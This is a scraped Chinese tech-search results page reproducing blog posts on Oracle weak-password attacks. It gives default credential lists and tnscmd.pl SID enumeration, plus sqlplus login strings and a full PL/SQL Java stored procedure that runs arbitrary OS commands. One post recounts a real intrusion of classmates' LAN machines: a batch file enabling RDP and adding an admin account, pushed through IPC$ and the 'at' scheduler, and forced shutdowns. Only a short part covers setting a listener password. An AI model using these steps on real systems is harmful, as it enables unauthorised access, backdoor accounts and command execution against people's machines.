精华内容
下载资源
问答
  • oracle弱口令攻击

    千次阅读 2019-04-18 11:48:00
    oracle弱口令攻击 oracle弱口令攻击 0x00 oracle数据库简介 oracle数据库是现在很流行的数据库系统,很多大型网站都采用Oracle,它之所以倍受用户喜爱是因为它有以下突出的特点: 一、支持大数据库、多用户...

    oracle弱口令攻击

    oracle弱口令攻击

     

     

    0x00 oracle数据库简介


    oracle数据库是现在很流行的数据库系统,很多大型网站都采用Oracle,它之所以倍受用户喜爱是因为它有以下突出的特点:

    一、支持大数据库、多用户的高性能的事务处理。Oracle支持最大数据库,其大小可到>几百千兆,可充分利用硬件设备。支持大量用户同时在

    同一数据上执行各种数据应用,并使数据争用最小,保证数据一致性。系统维护具有高>的性能,Oracle每天可连续24小时工作,正常的系统操作

    (后备或个别计算机系统故障)不会中断数据库的使用。可控制数据库数据的可用性,可在数据库级或在子数据库级上控制。

    二、Oracle遵守数据存取语言、操作系统、用户接口和网络通信协议的工业标准。所以>它是一个开放系统,保护了用户的投资。美国标准化和技术

    研究所(NIST)对Oracle7 SERVER进行检验,100%地与ANSI/ISO SQL89标准的二级相>兼容。

    三、实施安全性控制和完整性控制。Oracle为限制各监控数据存取提供系统可靠的安全>性。Oracle实施数据完整性,为可接受的数据指定标准。

    四、支持分布式数据库和分布处理。Oracle为了充分利用计算机系统和网络,允许将处理分为数据库服务器和客户应用程序,所有共享的数据管理 由数据库管理系统的计算机处理,而运行数据库应用的工作站集中于解释和显示数据。通过网络连接的计算机环境,Oracle将存放在多台计算机上的 数据组合成一个逻辑数据库,可被全部网络用户存取。分布式系统像集中式数据库一样具有透明性和数据一致性。 具有可移植性、可兼容性和可连接性。由于Oracle软件可在许多不同的操作系统上运 行,以致Oracle上所开发的应用 可移植到任何操作系统,只需很少修改或不需修改。Oracle软件同工业标准相兼容,包括很多工业标准的操作系统, 所开发应用系统可在任何操作系统上运行。可连接性是指ORALCE允许不同类型的计算机和操作系统通过网络可共享信息。

     


    虽然Oracle数据库具有很高的安全性,但是如果我们在配置的时候不注意安全意识,那么也是很危险的。也就是说,安全最主要的还是要靠人自己,而不能过分依赖软件来实现。


     

     

    我们知道,在 mssql中,安装完成后默认有个sa的登陆密码为空,如果不更改就会产生安全漏洞。那么 oracle呢?也有的。

    为了安装和调试的方便,Oracle数据库中的两个具有 DBA权限的用户 SysSystem的缺省密码是 manager

    笔者发现很多国内网站的Oracle数据库没有更改这两个用户的密码,其中也包括很多大型的电子商务网站, 我们就可以利用


    进行测试前我们先来了解一些相关的知识,我们连接一个 Oracle数据库的时候,需要知道它的 service_name或者是 Sid值,就象 mssql一样,需要知道数据库名。那如何去知道呢,猜?呵呵,显然是不行的。这里我们先讲讲 oracleTNS listener,它位于数据库 Client和数据库 Server之间,默认监听1521端口,这个监听端口是可以更改的。但是如果你用一个tcp的session去连接1521端口的话,oracle将不会返回它的banner,如果你输入一些东西的话,它甚至有可能把你踢出去。这里我们就需要用 tnscmd.pl这个 perl程序了,它可以查询远程oracle数据库是否开启(也就是ping了),查询版本,以及查询它的服务

    名,服务状态和数据库服务名,而且正确率很高。


     

     

     

    0x01 oracle弱口令攻击


    理论方面的讲完了,如果还有什么不懂的可以去查找相关资料。现在开始测试吧,需要的工具有: ActivePerlOracle客户端Superscan或者是 其它扫描端口的软件Tnscmd.pl

    我们先用 Superscan扫描开放了端口1521的主机,假设其IP是 xx.xx.110.110,这样目标已经有了。然后我们要做的就是用Tnscmd.pl 来查询远程数据库的服务名了,Tnscmd.pl的用法如下:

     

    C:perlbin>perl tnscmd.pl
    usage: tnscmd.pl [command] -h hostname
    where 'command' is something like ping, version, status, etc.
    (default is ping)
    [-p port] - alternate TCP port to use (default is 1521)
    [--logfile logfile] - write raw packets to specified logfile
    [--indent] - indent & outdent on parens
    [--rawcmd command] - build your own CONNECT_DATA string
    [--cmdsize bytes] - fake TNS command size (reveals packet leakage)

     

     

     

    我们下面用的只有简单的几个命令,其他的命令也很好用,一起去发掘吧。

    然后我们就这样来:

     

    C:perlbin>perl tnscmd.pl services -h xx.xx.110.110 -p 1521 –indent
    sending (CONNECT_DATA=(COMMAND=services)) to xx.xx.110.110:1521
    writing 91 bytes
    reading
    ._.......6.........?. ..........
    DESCRIPTION=
    TMP=
    VSNNUM=135286784
    ERR=0
    SERVICES_EXIST=1
    .Q........
    SERVICE=
    SERVICE_NAME=ORCL
    INSTANCE=
    INSTANCE_NAME=ORCL
    NUM=1
    INSTANCE_CLASS=ORACLE
    HANDLER=
    HANDLER_DISPLAY=DEDICATED SERVER
    STA=ready
    HANDLER_INFO=LOCAL SERVER
    HANDLER_MAXLOAD=0
    HANDLER_LOAD=0
    ESTABLISHED=447278
    REFUSED=0
    HANDLER_ID=8CA61D1BBDA6-3F5C-E030-813DF5430227
    HANDLER_NAME=DEDICATED
    ADDRESS=
    PROTOCOL=beq
    PROGRAM=/home/oracle/bin/oracle
    ENVS='ORACLE_HOME=/home/oracle,ORACLE_SID=ORCL'
    ARGV0=oracleORCL
    ARGS='
    LOCAL=NO
    '
    .........@  

     

    从上面得到的信息我们可以看出数据库的服务名为ORCL,然后我们就可以通过 sqlplus工具来远程连上它了,

    用户名和密码我们用默认的 system/manager或者是 sys/manager,其他的如 mdsys/mdsysctxsys/ctxsys等,

    这个默认用户和密码是随版本的不同而改变的。如下:

     

    1. C:oracleora90BIN>sqlplus /nolog
    2. SQL*Plus: Release 9.0.1.0.1 - Production on Thu May 23 11:36:59 2002
    3. (c) Copyright 2001 oracle Corporation. All rights reserved.
    4. SQL>connect system/manager@
    5. (description=(address_list=(address=(protocol=tcp)
    6. (host=xx.xx.110.110)(port=1521)))
    7. (connect_data=(SERVICE_NAME=ORCL)));

    如果密码正确,那么就会提示 connected,如果不行,再换别的默认用户名和密码。经过笔者的尝试一般用 dbsnmp/dbsnmp都能进去。当然如果对方已经把默认密码改了,那我们只能换别的目标了。但是我发现很多都是不改的,这个就是安全意识的问题了。


     

     

    0x02 上面提到的两个小软件:

    tnscmd.pl

    1. 代码: tnscmd.pl

    用链表实现的oracle密码暴破程序

    1. 代码: 用链表实现的oracle密码暴破程序

     

     

    0x03 利用弱口令进行入侵:

    #

    C:\>sqlplus /nolog
    SQL> connect system/manager@(description=(address_list=(address=(protocol=tcp)(host=www.xx.com)
    (port=1521)))(connect_data=(SERVICE_NAME=ora9i)));

     

    然后利用 OracleExecuteCommandSqlScript来执行系统命令

    posted @ 2019-04-18 11:48 卿先生 阅读(...) 评论(...) 编辑 收藏

    展开全文
  • 1.NMAP 扫描开放的常见端口,nmap4.9版本已经支持oracle tns 版本探测,可以方便的知道oracle版本信息 2.查找sid信息,可以通过访问isqlplus,使用账户dbsnmp/dbsnmp/来登录 这里oracle设计的isqlplus有一个Bug ...

    在这里插入图片描述
    1.NMAP 扫描开放的常见端口,nmap4.9版本已经支持oracle tns 版本探测,可以方便的知道oracle版本信息
    在这里插入图片描述
    2.查找sid信息,可以通过访问isqlplus,使用账户dbsnmp/dbsnmp/来登录 这里oracle设计的isqlplus有一个Bug
    可以不需要输入sid信息来登录,然后执行查询语句得到sid
    在这里插入图片描述
    3.得到SID后呢,使用sqlplus登录,通常的话用scott/tiger登录,因为这个账户具有resource权限
    在这里插入图片描述
    4.然后再使用sql injection 提权到dba
    在这里插入图片描述
    在这里插入图片描述
    5.调用pl/sql 执行系统命令
    在这里插入图片描述
    在这里插入图片描述

    展开全文
  • oracle常用口令

    2016-10-31 14:01:26
    oracle常用口令整理,绝对精僻
  • Oracle 10g弱口令攻击

    千次阅读 2011-10-20 14:24:16
    | 标签:java rc oracle bufsize int  |字号大中小 订阅   最近网速又是ungeliveble了…… "全民上网,决不BT下载!”这是局域网用网宗旨啊!无奈,好多童鞋就下载,而且全是一些烂电视剧...
      
    

    2011-01-08 13:52:44|  分类: Hack everything! |  标签:java  rc  oracle  bufsize  int   |字号 订阅

     

    最近网速又是ungeliveble了……

    "全民上网,决不BT下载!”这是局域网用网宗旨啊!无奈,好多童鞋就下载,而且全是一些烂电视剧,一不小心就是好几G,几十G,10M的网速怎么经得起这样的折腾!

    幸好他们的安全意识不怎么样,前天用默认的隐藏共享在另一个网段一些童鞋的C盘里丢了一下面的批处理mstsc.bat:

     reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

    net user test test /add

    net localgroup administrators test /add

     以上三条就是:

    1.       打开远程桌面

    2.       添加一个用户名/密码:test/test的用户

    3.       将test用添加到管理员组

    我这里LAN的机器全是Windows 2003的而且登录窗口是: 

    Oracle 10g弱口令攻击 - Neo - Neo-Sniper

    他们的安全意识似乎不高,所以我就没有必要添加什么隐藏用户之类的,然后再用下面的命令完成迅速占领

    C: >net use \\192.168.3.46\ipc$ " " /user:administrator

    命令成功完成。

    C: >net time \\192.168.3.46

    \\192.168.3.46 的当前时间是 2011-1-6 19:15

    命令成功完成。

    C: >at \\192.168.3.46 19:16 C:\windows\system32\mstsc.bat

    新加了一项作业,其作业 ID = 2

    是不是纠结怎么会有这么菜的机器等着我?不好好学习看电视剧的人就这样……

    至于如果修补我就不说了。

    等过了19:16就win+R:mstsc,用test/test成功进入它机器了(当然你用administrator/” ”登录也行 ,我创建个用户是为了防止他哪天心血来潮修改密码我又得花力气进去了……)

    在他电脑里装了流量监测软件,首先来个流量限制,然后谁下载就给他这个果子吃。

    shutdown –s –c ”大哥,别下载了……回家老婆孩子热炕头,OK?” –t 10

    如果他不会shutdown –a就等着关机吧!

    然后批量的执行了上面的操作,果然好多了……

    192.168.3.X网段的家伙气焰被打击了不少,自己的网段又来了……

    也许是被渲染了,这个家伙居然密码改了,隐藏共享全关了,流量出其的高,难道没撤了?!

    学Java要用Oracle是不?想不到Oracle也会让你栽吧?

    因为这里的机器都是刷机的,所有Oracle的密码都是一样的而且是DBA权限!

    先用mickey兄的调用msvcrt.dll文件来试,郁闷了,报错:

    Oracle 10g弱口令攻击 - Neo - Neo-Sniper

    也就是调用库文件出错了,网上解释全是listener.ora,tnsnames.ora配置文件有问题,咋办?我要是能进他电脑修改Oracle配置文件,还费这么大周张干什么?

    上下网而求索,终得方法:

    既然是弱口令,我就直接用PL/SQL Developer(Oracle数据开发软件,网上多的是)连接上他电脑的Oracle服务。

    连接上他电脑的Oracle了,就新建SQL窗口……然后:

    第一步:创建Java Sources文件用于执行cmd,学过Java就会明白,这段代码主要是干什么的,而且也很简单。

     CREATE OR REPLACE AND COMPILE JAVA SOURCE NAMED "util"
    AS
    import java.io.*;
    import java.lang.*;
    public class util extends Object
    {
      public static int RunThis(String args)
      {
        Runtime rt = Runtime.getRuntime();
        int RC = -1;
        try
        {
          Process p = rt.exec(args);
          int bufSize = 4096;
          BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize);
          int len;
          byte buffer[] = new byte[bufSize];
          // Echo back what the program spit out
          while ((len = bis.read(buffer, 0, bufSize)) != -1)
          System.out.write(buffer, 0, len);
          RC = p.waitFor();
        }
        catch (Exception e)
        {
          e.printStackTrace();
          RC = -1;
        }
        finally
        {
          return RC;
        }
      }
    }

       

    第二步:创建函数调用该代码

     CREATE OR REPLACE FUNCTION RUN_CMD(F_CMD IN VARCHAR2)
    RETURN NUMBER
    AS
    LANGUAGE JAVA
    NAME 'util.RunThis(java.lang.String) return integer';

    第三步:创建过程调用该函数

     CREATE OR REPLACE PROCEDURE RC(P_CMD IN VARCHAR2)
    AS
    X NUMBER;
    BEGIN
         X:=RUN_CMD(P_CMD);
    END;

    然后切换到你自己电脑的命令提示符下:

    1.       连接:

     Sqlplus system/密码@IP:端口号/数据服务名称
       2.       执行如下代码:

     VARIABLE X NUMBER;
    SET SERVEROUTPUT ON;
    EXEC DBMS_JAVA.SET_OUTPUT(100000);
    GRANT JAVASYSPRIV TO SYSTEM;
       3.       强行入侵代码:

     exec :x:=run_cmd('cmd /c cmd命令');  
     都这样了你还不是想干什么就干什么?开个后门什么的……

    截图示之:

    Oracle 10g弱口令攻击 - Neo - Neo-Sniper

    进他电脑……给予警告!然后继续学习……

    当然,完成攻击之后,在Oracle中把留下的JavaSources文件、函数、存储过程全删了,不给他留下!

    展开全文
  • 各种弱口令字典(ftp/oracle/tomcat/domino)、web目录
  • oracle 监听口令

    2015-08-25 18:05:04
    oracle 的监听机制 是外部应用程序连接oracle的入口。用oracle提供的lsnrctl 程序进行管理。一般很多人在管理oracle的时候,往往忽略对listener 的安全管理:监听在端口1521(默认端口...

    oracle 的监听机制 是外部应用程序连接oracle的入口。用oracle提供的lsnrctl 程序进行管理。一般很多人在管理oracle的时候,往往忽略对listener 的安全管理:监听在端口1521(默认端口)上的oracle tnslsnr未设置口令保护!

       这会存在这个安全隐患:远程的Oracle tnslsnr服务器没有被设置密码,一个攻击者可以利用这个问题随意关闭oracle tnslsnr服务器或者设置新的口令,这将影响合法用户的正常使用。攻击者也可以获取数据库的一些细节信息以发动进一步攻击。结合其他漏洞,攻击者甚至可以在目标系统上创建或者修改文件,进而入侵系统。
       这里对关于oracle监听模块密码安全设置的几个方法进行说明:
      1. 如何进行远程操作:
        在远程机器上修改listerner.ora 文件,增加对异地oracle服务器的配置,例如:
       ls_oratest =
       (DESCRIPTION_LIST =
        (DESCRIPTION =
          (ADDRESS = (PROTOCOL = IPC)(KEY = EXTPROC_FOR_XE))
          (ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.1.10)(PORT = 1521))
        )
       )       
      这里的HOST = 192.168.1.10 即是指明远程的oracle服务器。如果默认的,oracle服务器上没有设置
     listener 的管理密码,则在远程机器上只要执行:
         lsnrctl stop ls_oratest 
       即可停止192.168.1.10 服务器上的监听服务。
      2.如何修改密码:
        listener的密码策略对start无效,目的是防止恶意stop(start ,如果有在运行,则不成功,所以也就不需要保护了)
        修改密码方法如下:
        打开命令提示符窗口,输入lsnrctl进入lsnrctl监听器管理窗口:
    LSNRCTL> set current_listener listener
    目前的监听器为 listener
    LSNRCTL> change_password
    Old password:<输入旧密码,没有的话直接回车>
    New password:<输入新的密码>
    Reenter new password:<再次输入新密码>
    正在连接到 (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.1.10)(PORT=1521)))
    LISTENER的口令已更改
    命令执行成功
    LSNRCTL> set password
    Password:<再输一次新密码>
    命令执行成功
    LSNRCTL> save_config
    正在连接到 (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=xqing)(PORT=1521)))
    保存的LISTENER配置参数。
    监听器参数文件          D:\oracle\network\admin\listener.ora
    旧的参数文件D:\oracle\network\admin\listener.bak
    命令执行成功
    LSNRCTL>exit
          
        说明:
          a.执行save_config 需要再执行一次 set password 提供新密码,是因为在lsnrctl 管理工具中,是通过 set password 命令来设置当前环境的密码。设置了正确的密码后,就可以执行一些重要的操作,如save_config, stop 等。
          b 设置密码后,密码记录在listerner.ora 文件 中,
                 比如:
    #----ADDED BY TNSLSNR 18-2月 -2011 16:16:25---
    PASSWORDS_LISTENER = 9EDA43949D6C51A1
    #---------------------------------------------
             形式为:PASSWORDS_监听名称 = 密码密文。如果忘记密码,可以去掉该行,则密码为空。
          c.设置了密码后,远程机器如果需要stop监听的时候,则需要提供密码,否则操作失败。

       3.如何管理设置密码后的监听进程:
           a.如果是人工交互的操作,则只需在执行操作前面键入两个命令:
            lsnrct<
               set current_listener listener_oratest  <-- 设置当前监听器的配置名称
               set password 
               Password: <输入口令>
               stop
           b.如果是脚本自动执行,则需要提供密码的密文(由isterner.ora 文件获得)
              #!/bin/sh
              lsnrctl << eof
                set current_listener listener_oratest
                set password AF15F0B512F2229A 
                stop
               eof

    来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/27133109/viewspace-1782457/,如需转载,请注明出处,否则将追究法律责任。

    转载于:http://blog.itpub.net/27133109/viewspace-1782457/

    展开全文
  • 超级弱口令检查工具

    2019-04-10 11:41:18
    工具目前支持SSH、RDP、MySQL、SQLServer、Oracle、FTP、MongoDB、Memcached、PostgreSQL、Telnet、SMTP、SMTP_SSL、POP3、POP3_SSL、IMAP、IMAP_SSL、SVN、VNC、Redis等服务的弱口令检查工作。
  • 工具目前支持SSH、RDP、SMB、MySQL、SQLServer、Oracle、FTP、MongoDB、Memcached、PostgreSQL、Telnet、SMTP、SMTP_SSL、POP3、POP3_SSL、IMAP、IMAP_SSL、SVN、VNC、Redis等服务的弱口令检查工作。 工具特点: 1....
  • SQL语句修改:连接至Oracle后使用如下命令修改口令:alter user system(用户名) identified by manager(密码);连接至Oracle后使用如下命令锁定账号:alter user test(用户名) account lock; 图形窗口修改:...
  • 工具目前支持SSH、RDP、SMB、MySQL、SQLServer、Oracle、FTP、MongoDB、Memcached、PostgreSQL、Telnet、SMTP、SMTP_SSL、POP3、POP3_SSL、IMAP、IMAP_SSL、VNC、Redis等服务的弱口令检查工作。 其他依赖:检查SSH...
  • 工具采用C#开发,工具目前支持检查SSH,FTP,MySQL,SQLServer,Oracle,MongoDB,PostgreSQL等服务的弱口令问题。
  • 工具目前支持SSH、RDP、SMB、MySQL、SQLServer、Oracle、FTP、MongoDB、Memcached、PostgreSQL、Telnet、SMTP、SMTP_SSL、POP3、POP3_SSL、IMAP、IMAP_SSL、VNC、Redis等服务的弱口令检查工作。
  • 工具目前支持SSH、RDP、SMB、MySQL、SQLServer、Oracle、FTP、MongoDB、Memcached、PostgreSQL、Telnet、SMTP、SMTP_SSL、POP3、POP3_SSL、IMAP、IMAP_SSL、VNC、Redis等服务的弱口令检查工作。
  • 漏洞一、后台弱口令 后台地址:http://www.hnmatc.org/admin/ 直接爆破得到账号admin 密码admin888 漏洞二、SQL注入(前台后台都有) 注入点:http://www.hnmatc.org/contents_news_down.aspx?id=669&...
  • 弱口令 环境启动后,访问http://192.168.1.15:7001/console/login/LoginForm.jsp,即为weblogic后台。 本环境存在弱口令可以直接登录: weblogic Oracle@123 weblogic常用弱口令: 1. Oracle - WebLogic Method ...
  • Weblogic 文件读取弱口令漏洞 by ADummy 0x00利用路线 ​ 后台弱口令、如果爆破不出来,可以用文件读取漏洞解密—>后台上传war包—>getshell 0x01漏洞介绍 ​ 本环境模拟了一个真实的weblogic环境,其后台...
  • 常用弱口令

    万次阅读 2018-09-26 13:39:29
    user.txt: admin sa Administrator system administrator systeminfo ...oracle001 oracle.com root ftp anonymous oracle console pass.txt: 654321 admin sa toor root123 adminroot 123 abc123 ...
  • msf各种弱口令爆破

    千次阅读 2018-12-16 22:29:00
    msf各种弱口令爆破 Msf: 写的很乱 记录下msf各个爆破弱口令的模块 run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24使用arp_scanner模块 检测在线主机 metasploit 增加路由 route add 10.10....
  • 通过使用 Python 实现一个 FTP 弱口令扫描器开始,入门 Python 渗透测试技术
  • 爆破工具 - 超级弱口令检查工具

    千次阅读 2020-11-24 20:03:22
    在渗透测试中,针对各项服务(FTP、RDP等)的爆破往往是繁琐的,一款好用的爆破工具,可以提高渗透测试的效率,超级弱口令检查工具(作者shack2)支持很多服务的爆破,支持批量导入爆破。自己经常使用的是Metasploit...
  • 目前,帐号仍然是最主要的用户身份认证方式,但由于安全意识的淡漠,很多人仍在使用弱口令。而一旦泄漏,所有安全防范机制都将形同虚设。 本课程《用户口令审计》是『Kali Linux工具大全』技术系列的第5部分。向大家...
  • 【研究】weblogic漏洞系列- 弱口令和解密1.环境2.原理3.影响版本4.利用过程任意文件读取漏洞的利用webshell 1.环境 Weblogic版本:10.3.6(11g) Java版本:1.6 本环境模拟了一个真实的weblogic环境,其后台存在一个...
  • ssh弱口令暴力破解

    2021-03-28 19:31:09
    ssh弱口令暴力破解 ssh (安全外壳协议) SSH 为 Secure Shell 的缩写,由 IETF 的网络小组(Network Working Group)所制定;SSH 为建立在应用层基础上的安全协议。SSH 是较可靠,专为远程登录会话和其他网络服务...
  • ftp弱口令猜解  python脚本: #! /usr/bin/env python # _*_ coding:utf-8 _*_ import ftplib,time username_list=['root','ftp','admin'] password_list=['root','123','ftp','oracle'] def ftp(ip...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 2,412
精华内容 964
关键字:

oracle弱口令